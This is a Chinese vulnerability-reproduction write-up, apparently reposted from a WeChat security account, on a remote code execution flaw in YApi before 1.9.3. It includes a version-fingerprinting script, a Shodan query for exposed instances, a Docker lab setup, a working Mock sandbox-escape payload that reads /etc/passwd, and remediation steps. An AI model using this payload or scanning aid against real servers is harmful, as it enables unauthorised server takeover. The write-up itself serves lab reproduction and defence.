YApi管理平台任意代码执行漏洞复现
2023-5-25 15:12:34 Author: 白帽子左一(查看原文) 阅读量:89 收藏

文章目录

  • 漏洞简述

  • 漏洞影响版本

    • 如何判断YApi当前版本?

  • Shodan 搜索语法

  • 漏洞exp

  • 漏洞环境搭建

  • 漏洞复现

  • 入侵溯源

  • 修复方式

漏洞简述

YApi 是一个可本地部署的、打通前后端及QA的、可视化的接口管理平台。若Yapi对外开放注册功能,攻击者可在注册并登录后,通过Mock构造特殊的请求执行任意代码,获取服务器权限。

漏洞影响版本

YApi < 1.9.3

如何判断YApi当前版本?

YApi网站底部显示了当前版本号,不过该version是通过js渲染生成的,直接请求首页无法拿到版本号。我简单写的一个脚本判断yapi版本号。

  1. import requests

  2. import sys

  3. import re

  4. ip = sys.argv\[1\]

  5. baseurl = "http://" + ip + ":3000/prd/"

  6. aseet\_js = "assets.js"

  7. r = requests.get(baseurl+aseet\_js)

  8. regex = r"[email protected]\[\\w\]+?.js"

  9. index\_js\_name = re.search(regex,r.text).group()

  10. index\_js\_url = baseurl +index\_js\_name

  11. regex = r'newVersion:"(\[\\d.\]+)"'

  12. r = requests.get(index\_js\_url)

  13. version = re.search(regex,r.text).group(1)

  14. print(ip,version)

  15. \# 判断当前版本是否小于1.9.3

  16. \_,v,sub\_v = version.split('.')

  17. if int(v) < 9 or int(v) == 9 and int(sub\_v) <3:

  18. print(version," http://" + ip + ":3000")

Shodan 搜索语法

http.favicon.hash:-715193973

漏洞exp

https://github.com/j2ekim/YApi_exp

漏洞环境搭建

  1. cd vulhub/yapi/unacc

  2. docker-compose up -d

访问 http://IP:3000 首页点击注册。

漏洞复现

添加项目。

设置Mock后保存。

  1. const sandbox = this

  2. const ObjectConstructor = this.constructor

  3. const FunctionConstructor = ObjectConstructor.constructor

  4. const myfun = FunctionConstructor('return process')

  5. const process = myfun()

  6. mockJson = process.mainModule.require("child\_process").execSync("cat /etc/passwd").toString()

访问Mock地址。

复现成功。

入侵溯源

yapi本身没有日志,所有信息记录在数据库中。这里我用docker搭建的漏洞环境,使用的mongdb。由于该漏洞需要注册才能利用,可通过数据库查询攻击ip。

修复方式

  1. 升级至1.9.3以上版本。

  2. 编辑Yapi目录下的 config.json 文件,设置 closeRegister 为 true,关闭Yapi的前台注册功能。


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247595063&idx=1&sn=56ffc450e12a33b15a98a8c39e5e26e0&chksm=ebeb3d1adc9cb40c937b85dfd65b825062b91640d2f5bc691f70d8c1098c16fccfa7ec3aa3d5#rd
如有侵权请联系:admin#unsafe.sh